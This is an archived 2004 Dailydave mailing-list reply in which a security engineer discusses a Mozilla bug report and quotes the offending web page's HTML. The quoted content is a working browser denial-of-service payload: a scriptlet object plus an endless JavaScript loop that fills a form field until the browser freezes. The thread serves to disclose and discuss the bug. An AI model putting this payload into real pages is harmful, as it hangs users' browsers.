Dailydave mailing list archives

Re: Mozilla bug might even get fixed!

From: Mordy Ovits <movits () bloomberg com>
Date: Fri, 14 May 2004 11:10:09 -0400

On Friday 14 May 2004 10:57 am, Dave Aitel wrote:

Someone sent me this...

http://bugzilla.mozilla.org/show_bug.cgi?id=243540

I'm not sure how they managed to capture the attack, since it was gone
when I looked for it, but it does work. :>


Konqueror pops up a nifty dialog box warning and lets you kill the script:
http://www.ovits.org/konqsploit.png

Here's the questionable content in text/plain:
=====
<object id="test" data="#" width="100%" height="100%" type="text/x-scriptlet" 
VIEWASTEXT></object>

<form name="form"><input type="text" name="box"><form>

<script language="javascript">
while(true) { document.form.box.value=document.form.box.value + ' '; }
</script>
=====

Mordy
-- 
Mordy Ovits
Network Security
Bloomberg L.P.

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave

Current thread:

Mozilla bug might even get fixed! Dave Aitel (May 14)
- Re: Mozilla bug might even get fixed! Mordy Ovits (May 14)